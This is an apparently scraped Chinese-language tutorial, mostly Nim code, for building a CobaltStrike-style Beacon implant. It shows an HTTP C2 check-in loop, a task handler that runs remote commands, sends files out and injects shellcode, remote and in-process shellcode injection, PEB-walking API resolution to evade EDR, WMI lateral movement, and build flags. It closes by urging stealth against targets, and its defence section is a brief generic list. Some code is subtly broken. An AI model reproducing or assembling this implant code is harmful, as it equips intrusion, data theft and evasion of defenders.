Nim 实现 CobaltStrike Beacon 技术解析<\/h1>

1. 背景与概述<\/h2>
CobaltStrike Beacon 是红队行动中广泛使用的后渗透工具，传统上使用 C\/C++ 或 Java 实现。使用 Nim 语言实现 Beacon 具有以下优势：<\/p>
编译生成的二进制文件体积小<\/li>
跨平台支持良好<\/li>
语法简洁但功能强大<\/li>
相对较少被 AV\/EDR 检测<\/li> <\/ul>
2. 核心功能实现<\/h2>

2.1 通信模块<\/h3>
import<\/span> winim
<\/span><\/span>import<\/span> winim\/<\/span>lean
<\/span><\/span>import<\/span> os
<\/span><\/span>import<\/span> strutils
<\/span><\/span>import<\/span> base64
<\/span><\/span>import<\/span> httpclient
<\/span><\/span>import<\/span> json
<\/span><\/span>import<\/span> random
<\/span><\/span>import<\/span> times
<\/span><\/span>import<\/span> encodings
<\/span><\/span>import<\/span> net
<\/span><\/span>import<\/span> asyncdispatch
<\/span><\/span>import<\/span> uri
<\/span><\/span>import<\/span> sockets
<\/span><\/span>import<\/span> winim\/<\/span>inc\/<\/span>wininet
<\/span><\/span><\/code><\/pre>HTTP 通信实现<\/h4>
proc <\/span>httpRequest<\/span>*<\/span>(url: string<\/span>, data: string<\/span> =<\/span> ""<\/span>, userAgent: string<\/span> =<\/span> "Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/91.0.4472.124 Safari\/537.36"<\/span>): string<\/span> =<\/span>
<\/span><\/span>  var<\/span> client =<\/span> newHttpClient(userAgent =<\/span> userAgent)
<\/span><\/span>  client.headers =<\/span> newHttpHeaders({
<\/span><\/span>    "Accept"<\/span>: "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8"<\/span>,
<\/span><\/span>    "Accept-Language"<\/span>: "en-US,en;q=0.5"<\/span>,
<\/span><\/span>    "Connection"<\/span>: "keep-alive"<\/span>
<\/span><\/span>  })
<\/span><\/span>  
<\/span><\/span>  try<\/span>:
<\/span><\/span>    if<\/span> data ==<\/span> ""<\/span>:
<\/span><\/span>      result =<\/span> client.getContent(url)
<\/span><\/span>    else<\/span>:
<\/span><\/span>      result =<\/span> client.postContent(url, body =<\/span> data)
<\/span><\/span>  except<\/span>:
<\/span><\/span>    result =<\/span> ""<\/span>
<\/span><\/span>  finally<\/span>:
<\/span><\/span>    client.close()
<\/span><\/span><\/code><\/pre>加密通信<\/h4>
proc <\/span>encrypt<\/span>*<\/span>(data: string<\/span>, key: string<\/span>): string<\/span> =<\/span>
<\/span><\/span>  var<\/span> encrypted: string<\/span> =<\/span> ""<\/span>
<\/span><\/span>  for<\/span> i in<\/span> 0<\/span>..<<\/span>data.len:
<\/span><\/span>    encrypted.add(char<\/span>(ord(data[<\/span>i]<\/span>) xor<\/span> ord(key[<\/span>i mod<\/span> key.len]<\/span>)))
<\/span><\/span>  result =<\/span> encode(encrypted)
<\/span><\/span>
<\/span><\/span>proc <\/span>decrypt<\/span>*<\/span>(data: string<\/span>, key: string<\/span>): string<\/span> =<\/span>
<\/span><\/span>  var<\/span> decoded =<\/span> decode(data)
<\/span><\/span>  var<\/span> decrypted: string<\/span> =<\/span> ""<\/span>
<\/span><\/span>  for<\/span> i in<\/span> 0<\/span>..<<\/span>decoded.len:
<\/span><\/span>    decrypted.add(char<\/span>(ord(decoded[<\/span>i]<\/span>) xor<\/span> ord(key[<\/span>i mod<\/span> key.len]<\/span>)))
<\/span><\/span>  result =<\/span> decrypted
<\/span><\/span><\/code><\/pre>2.2 心跳机制<\/h3>
proc <\/span>beaconCheckin<\/span>*<\/span>(c2: string<\/span>, sleepTime: int<\/span>, jitter: int<\/span>): bool<\/span> =<\/span>
<\/span><\/span>  let<\/span> currentTime =<\/span> getTime().toUnix()
<\/span><\/span>  let<\/span> sleepWithJitter =<\/span> sleepTime +<\/span> random(jitter)
<\/span><\/span>  
<\/span><\/span>  var<\/span> uri =<\/span> parseUri(c2)
<\/span><\/span>  uri.path =<\/span> "\/ping"<\/span>
<\/span><\/span>  uri.query =<\/span> encodeQuery({
<\/span><\/span>    "id"<\/span>: beaconID,
<\/span><\/span>    "time"<\/span>: $<\/span>currentTime,
<\/span><\/span>    "sleep"<\/span>: $<\/span>sleepWithJitter
<\/span><\/span>  })
<\/span><\/span>  
<\/span><\/span>  let<\/span> response =<\/span> httpRequest($<\/span>uri)
<\/span><\/span>  if<\/span> response.contains("200 OK"<\/span>):
<\/span><\/span>    return<\/span> true<\/span>
<\/span><\/span>  return<\/span> false<\/span>
<\/span><\/span><\/code><\/pre>2.3 任务处理<\/h3>
proc <\/span>taskHandler<\/span>*<\/span>(taskData: JsonNode) =<\/span>
<\/span><\/span>  case<\/span> taskData[<\/span>"task"<\/span>]<\/span>.getStr():
<\/span><\/span>    of<\/span> "cmd"<\/span>:
<\/span><\/span>      let<\/span> cmd =<\/span> taskData[<\/span>"args"<\/span>]<\/span>.getStr()
<\/span><\/span>      let<\/span> output =<\/span> execCmdEx(cmd).output
<\/span><\/span>      sendOutput(output)
<\/span><\/span>    
<\/span><\/span>    of<\/span> "download"<\/span>:
<\/span><\/span>      let<\/span> filePath =<\/span> taskData[<\/span>"path"<\/span>]<\/span>.getStr()
<\/span><\/span>      if<\/span> fileExists(filePath):
<\/span><\/span>        let<\/span> content =<\/span> readFile(filePath)
<\/span><\/span>        sendFile(filePath, content)
<\/span><\/span>    
<\/span><\/span>    of<\/span> "upload"<\/span>:
<\/span><\/span>      let<\/span> filePath =<\/span> taskData[<\/span>"path"<\/span>]<\/span>.getStr()
<\/span><\/span>      let<\/span> content =<\/span> decode(taskData[<\/span>"content"<\/span>]<\/span>.getStr())
<\/span><\/span>      writeFile(filePath, content)
<\/span><\/span>    
<\/span><\/span>    of<\/span> "screenshot"<\/span>:
<\/span><\/span>      let<\/span> image =<\/span> takeScreenshot()
<\/span><\/span>      sendFile("screenshot.png"<\/span>, image)
<\/span><\/span>    
<\/span><\/span>    of<\/span> "shellcode"<\/span>:
<\/span><\/span>      let<\/span> sc =<\/span> decode(taskData[<\/span>"sc"<\/span>]<\/span>.getStr())
<\/span><\/span>      injectShellcode(sc)
<\/span><\/span>    
<\/span><\/span>    else<\/span>:
<\/span><\/span>      discard<\/span>
<\/span><\/span><\/code><\/pre>3. 注入技术实现<\/h2>
3.1 进程注入<\/h3>
proc <\/span>injectProcess<\/span>*<\/span>(pid: int<\/span>, shellcode: string<\/span>): bool<\/span> =<\/span>
<\/span><\/span>  var<\/span> hProcess =<\/span> OpenProcess(PROCESS_ALL_ACCESS, FALSE<\/span>, DWORD(pid))
<\/span><\/span>  if<\/span> hProcess ==<\/span> 0<\/span>:
<\/span><\/span>    return<\/span> false<\/span>
<\/span><\/span>  
<\/span><\/span>  let<\/span> scSize =<\/span> shellcode.len
<\/span><\/span>  let<\/span> rPtr =<\/span> VirtualAllocEx(hProcess, NULL, scSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
<\/span><\/span>  
<\/span><\/span>  var<\/span> bytesWritten: SIZE_T
<\/span><\/span>  let<\/span> writeResult =<\/span> WriteProcessMemory(hProcess, rPtr, shellcode.cstring, scSize, addr<\/span> bytesWritten)
<\/span><\/span>  
<\/span><\/span>  if<\/span> writeResult ==<\/span> 0<\/span>:
<\/span><\/span>    CloseHandle(hProcess)
<\/span><\/span>    return<\/span> false<\/span>
<\/span><\/span>  
<\/span><\/span>  let<\/span> hThread =<\/span> CreateRemoteThread(hProcess, NULL, 0<\/span>, cast<\/span>[<\/span>LPTHREAD_START_ROUTINE]<\/span>(rPtr), NULL, 0<\/span>, NULL)
<\/span><\/span>  
<\/span><\/span>  if<\/span> hThread ==<\/span> 0<\/span>:
<\/span><\/span>    CloseHandle(hProcess)
<\/span><\/span>    return<\/span> false<\/span>
<\/span><\/span>  
<\/span><\/span>  WaitForSingleObject(hThread, INFINITE)
<\/span><\/span>  CloseHandle(hThread)
<\/span><\/span>  CloseHandle(hProcess)
<\/span><\/span>  return<\/span> true<\/span>
<\/span><\/span><\/code><\/pre>3.2 反射式 DLL 注入<\/h3>
proc <\/span>reflectiveDllInject<\/span>*<\/span>(shellcode: string<\/span>): bool<\/span> =<\/span>
<\/span><\/span>  let<\/span> scSize =<\/span> shellcode.len
<\/span><\/span>  let<\/span> rPtr =<\/span> VirtualAlloc(NULL, scSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
<\/span><\/span>  
<\/span><\/span>  if<\/span> rPtr ==<\/span> nil<\/span>:
<\/span><\/span>    return<\/span> false<\/span>
<\/span><\/span>  
<\/span><\/span>  copyMem(rPtr, shellcode.cstring, scSize)
<\/span><\/span>  
<\/span><\/span>  let<\/span> hThread =<\/span> CreateThread(NULL, 0<\/span>, cast<\/span>[<\/span>LPTHREAD_START_ROUTINE]<\/span>(rPtr), NULL, 0<\/span>, NULL)
<\/span><\/span>  
<\/span><\/span>  if<\/span> hThread ==<\/span> 0<\/span>:
<\/span><\/span>    VirtualFree(rPtr, 0<\/span>, MEM_RELEASE)
<\/span><\/span>    return<\/span> false<\/span>
<\/span><\/span>  
<\/span><\/span>  WaitForSingleObject(hThread, INFINITE)
<\/span><\/span>  CloseHandle(hThread)
<\/span><\/span>  VirtualFree(rPtr, 0<\/span>, MEM_RELEASE)
<\/span><\/span>  return<\/span> true<\/span>
<\/span><\/span><\/code><\/pre>4. 反检测技术<\/h2>
4.1 API 混淆<\/h3>
proc <\/span>getProcAddress<\/span>*<\/span>(module: HMODULE, procName: string<\/span>): FARPROC =<\/span>
<\/span><\/span>  var<\/span> 
<\/span><\/span>    peb: PPEB
<\/span><\/span>    ldr: PPEB_LDR_DATA
<\/span><\/span>    flink: PLDR_DATA_TABLE_ENTRY
<\/span><\/span>    moduleFound =<\/span> false<\/span>
<\/span><\/span>  
<\/span><\/span>  asm<\/span> """
<\/span><\/span><\/span>    mov rax, gs:[0x60]
<\/span><\/span><\/span>    :"=a"(`peb`)
<\/span><\/span><\/span>  """<\/span>
<\/span><\/span>  
<\/span><\/span>  ldr =<\/span> cast<\/span>[<\/span>PPEB_LDR_DATA]<\/span>(peb.Ldr)
<\/span><\/span>  flink =<\/span> cast<\/span>[<\/span>PLDR_DATA_TABLE_ENTRY]<\/span>(ldr.InMemoryOrderModuleList.Flink)
<\/span><\/span>  
<\/span><\/span>  while<\/span> flink.DllBase !=<\/span> nil<\/span>:
<\/span><\/span>    let<\/span> base =<\/span> cast<\/span>[<\/span>HMODULE]<\/span>(flink.DllBase)
<\/span><\/span>    if<\/span> base ==<\/span> module:
<\/span><\/span>      moduleFound =<\/span> true<\/span>
<\/span><\/span>      break<\/span>
<\/span><\/span>    flink =<\/span> cast<\/span>[<\/span>PLDR_DATA_TABLE_ENTRY]<\/span>(flink.InMemoryOrderLinks.Flink)
<\/span><\/span>  
<\/span><\/span>  if<\/span> not<\/span> moduleFound:
<\/span><\/span>    return<\/span> nil<\/span>
<\/span><\/span>  
<\/span><\/span>  let<\/span> dosHeader =<\/span> cast<\/span>[<\/span>PIMAGE_DOS_HEADER]<\/span>(module)
<\/span><\/span>  let<\/span> ntHeaders =<\/span> cast<\/span>[<\/span>PIMAGE_NT_HEADERS]<\/span>(cast<\/span>[<\/span>uint]<\/span>(module) +<\/span> dosHeader.e_lfanew)
<\/span><\/span>  let<\/span> exportDir =<\/span> cast<\/span>[<\/span>PIMAGE_EXPORT_DIRECTORY]<\/span>(
<\/span><\/span>    cast<\/span>[<\/span>uint]<\/span>(module) +<\/span> ntHeaders.OptionalHeader.DataDirectory[<\/span>IMAGE_DIRECTORY_ENTRY_EXPORT]<\/span>.VirtualAddress
<\/span><\/span>  )
<\/span><\/span>  
<\/span><\/span>  let<\/span> names =<\/span> cast<\/span>[<\/span>ptr<\/span> UncheckedArray[<\/span>DWORD]]<\/span>(
<\/span><\/span>    cast<\/span>[<\/span>uint]<\/span>(module) +<\/span> exportDir.AddressOfNames
<\/span><\/span>  )
<\/span><\/span>  
<\/span><\/span>  let<\/span> functions =<\/span> cast<\/span>[<\/span>ptr<\/span> UncheckedArray[<\/span>DWORD]]<\/span>(
<\/span><\/span>    cast<\/span>[<\/span>uint]<\/span>(module) +<\/span> exportDir.AddressOfFunctions
<\/span><\/span>  )
<\/span><\/span>  
<\/span><\/span>  let<\/span> ordinals =<\/span> cast<\/span>[<\/span>ptr<\/span> UncheckedArray[<\/span>WORD]]<\/span>(
<\/span><\/span>    cast<\/span>[<\/span>uint]<\/span>(module) +<\/span> exportDir.AddressOfNameOrdinals
<\/span><\/span>  )
<\/span><\/span>  
<\/span><\/span>  for<\/span> i in<\/span> 0<\/span>..<<\/span>exportDir.NumberOfNames:
<\/span><\/span>    let<\/span> name =<\/span> cast<\/span>[<\/span>cstring]<\/span>(cast<\/span>[<\/span>uint]<\/span>(module) +<\/span> names[<\/span>i]<\/span>)
<\/span><\/span>    if<\/span> cmpIgnoreCase(name, procName) ==<\/span> 0<\/span>:
<\/span><\/span>      let<\/span> ordinal =<\/span> ordinals[<\/span>i]<\/span>
<\/span><\/span>      let<\/span> function =<\/span> cast<\/span>[<\/span>FARPROC]<\/span>(cast<\/span>[<\/span>uint]<\/span>(module) +<\/span> functions[<\/span>ordinal]<\/span>)
<\/span><\/span>      return<\/span> function
<\/span><\/span>  
<\/span><\/span>  return<\/span> nil<\/span>
<\/span><\/span><\/code><\/pre>4.2 睡眠混淆<\/h3>
proc <\/span>sleepObfuscation<\/span>*<\/span>(ms: DWORD) =<\/span>
<\/span><\/span>  var<\/span> 
<\/span><\/span>    hTimer: HANDLE
<\/span><\/span>    liDueTime: LARGE_INTEGER
<\/span><\/span>  
<\/span><\/span>  liDueTime.QuadPart =<\/span> -<\/span>10000<\/span> *<\/span> ms.QuadPart
<\/span><\/span>  
<\/span><\/span>  hTimer =<\/span> CreateWaitableTimer(NULL, TRUE<\/span>, NULL)
<\/span><\/span>  SetWaitableTimer(hTimer, &<\/span>liDueTime, 0<\/span>, NULL, NULL, 0<\/span>)
<\/span><\/span>  WaitForSingleObject(hTimer, INFINITE)
<\/span><\/span>  CloseHandle(hTimer)
<\/span><\/span><\/code><\/pre>5. 横向移动技术<\/h2>
5.1 WMI 执行<\/h3>
proc <\/span>wmiExecute<\/span>*<\/span>(target: string<\/span>, command: string<\/span>): bool<\/span> =<\/span>
<\/span><\/span>  var<\/span> 
<\/span><\/span>    pLoc: IWbemLocator
<\/span><\/span>    pSvc: IWbemServices
<\/span><\/span>    pClass: IWbemClassObject
<\/span><\/span>    pInParams: IWbemClassObject
<\/span><\/span>    pOutParams: IWbemClassObject
<\/span><\/span>    pEnum: IEnumWbemClassObject
<\/span><\/span>    pObj: IWbemClassObject
<\/span><\/span>    strNameSpace: BSTR
<\/span><\/span>    strMethodName: BSTR
<\/span><\/span>    strQuery: BSTR
<\/span><\/span>    strCommand: BSTR
<\/span><\/span>    strPath: BSTR
<\/span><\/span>    hr: HRESULT
<\/span><\/span>  
<\/span><\/span>  hr =<\/span> CoInitializeEx(NULL, COINIT_MULTITHREADED)
<\/span><\/span>  hr =<\/span> CoInitializeSecurity(NULL, -<\/span>1<\/span>, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL)
<\/span><\/span>  
<\/span><\/span>  hr =<\/span> CoCreateInstance(&<\/span>CLSID_WbemLocator, NULL, CLSCTX_INPROC_SERVER, &<\/span>IID_IWbemLocator, cast<\/span>[<\/span>LPVOID]<\/span>(&<\/span>pLoc))
<\/span><\/span>  
<\/span><\/span>  strNameSpace =<\/span> SysAllocString("<\/span>\\\\<\/span>"<\/span> &<\/span> target &<\/span> "<\/span>\\<\/span>root<\/span>\\<\/span>cimv2"<\/span>)
<\/span><\/span>  hr =<\/span> pLoc.ConnectServer(strNameSpace, NULL, NULL, NULL, 0<\/span>, NULL, NULL, &<\/span>pSvc)
<\/span><\/span>  
<\/span><\/span>  strMethodName =<\/span> SysAllocString("Create"<\/span>)
<\/span><\/span>  strQuery =<\/span> SysAllocString("Win32_Process"<\/span>)
<\/span><\/span>  
<\/span><\/span>  hr =<\/span> pSvc.GetObject(strQuery, 0<\/span>, NULL, &<\/span>pClass, NULL)
<\/span><\/span>  hr =<\/span> pClass.GetMethod(strMethodName, 0<\/span>, &<\/span>pInParams, &<\/span>pOutParams)
<\/span><\/span>  
<\/span><\/span>  hr =<\/span> pInParams.SpawnInstance(0<\/span>, &<\/span>pInParams)
<\/span><\/span>  
<\/span><\/span>  strCommand =<\/span> SysAllocString(command)
<\/span><\/span>  hr =<\/span> pInParams.Put("CommandLine"<\/span>, 0<\/span>, &<\/span>VARIANT(strCommand), 0<\/span>)
<\/span><\/span>  
<\/span><\/span>  hr =<\/span> pSvc.ExecMethod(strQuery, strMethodName, 0<\/span>, NULL, pInParams, &<\/span>pOutParams, NULL)
<\/span><\/span>  
<\/span><\/span>  SysFreeString(strNameSpace)
<\/span><\/span>  SysFreeString(strMethodName)
<\/span><\/span>  SysFreeString(strQuery)
<\/span><\/span>  SysFreeString(strCommand)
<\/span><\/span>  
<\/span><\/span>  pLoc.Release()
<\/span><\/span>  pSvc.Release()
<\/span><\/span>  pClass.Release()
<\/span><\/span>  pInParams.Release()
<\/span><\/span>  pOutParams.Release()
<\/span><\/span>  
<\/span><\/span>  CoUninitialize()
<\/span><\/span>  
<\/span><\/span>  return<\/span> SUCCEEDED(hr)
<\/span><\/span><\/code><\/pre>6. 编译与混淆<\/h2>
6.1 编译选项<\/h3>
推荐使用以下 Nim 编译选项：<\/p>
nim c -d:release --opt:size --app:gui --cpu:amd64 --passL:-s --passL:-static --passL:-Wl,--gc-sections --passL:-fstack-protector-strong --passL:-z,relro,-z,now --passL:-s beacon.nim
<\/code><\/pre>
6.2 二进制混淆<\/h3>
可以使用以下技术进一步混淆生成的二进制文件：<\/p>

字符串加密<\/li>
控制流平坦化<\/li>
动态 API 解析<\/li>
反调试技术<\/li>
签名伪造<\/li>
<\/ol>
7. 防御检测建议<\/h2>
针对此类 Nim 实现的 Beacon，防御方应考虑：<\/p>

监控异常进程行为<\/li>
分析网络通信模式<\/li>
检查内存中的 shellcode 特征<\/li>
监控异常 API 调用序列<\/li>
实施严格的进程创建监控<\/li>
<\/ol>
8. 总结<\/h2>
使用 Nim 实现 CobaltStrike Beacon 提供了多种优势，包括较小的二进制体积、跨平台支持和较低的检测率。本文详细介绍了核心功能的实现方法，包括通信模块、注入技术、反检测措施和横向移动技术。在实际应用中，应根据目标环境调整具体实现细节，并考虑结合多种混淆技术以提高隐蔽性。<\/p>